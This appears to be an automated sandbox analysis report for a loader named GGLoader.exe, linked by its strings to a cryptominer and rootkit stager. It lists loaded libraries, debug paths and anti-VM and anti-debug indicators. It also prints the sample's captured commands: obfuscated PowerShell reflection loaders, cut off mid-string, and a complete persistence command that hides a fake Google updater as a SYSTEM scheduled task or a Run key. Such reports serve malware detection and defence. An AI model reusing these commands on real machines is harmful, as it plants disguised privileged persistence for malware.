Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: netutils.dll
Source: C:\Windows\System32\dialer.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\dialer.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\dialer.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\dialer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\dialer.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\dialer.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\dialer.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\GGLoader.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: GGLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: GGLoader.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbQZmW source: powershell.exe, 00000001.00000002.1955811622.000001EC48C05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\Mining\Miner\SilentCryptoMiner\r77-rootkit-master\Stager\obj\x64\Release\Stager.pdb source: LicSend.exe, 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ore.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbD source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1965111928.000001EC48EB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000026.00000002.2213441971.0000000002851000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: t.Automation.pdb_ source: powershell.exe, 00000001.00000002.1951237178.000001EC48B7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb23~W4 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb:3FW3 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000028.00000002.2583801472.000001C536CC8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Source: GGLoader.exe, 00000000.00000000.1702342271.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: dotNetProtector
Source: GGLoader.exe, 00000000.00000000.1702342271.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
Source: GGLoader.exe String found in binary or memory: dotNetProtector
Source: GGLoader.exe String found in binary or memory: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+
''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)
+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
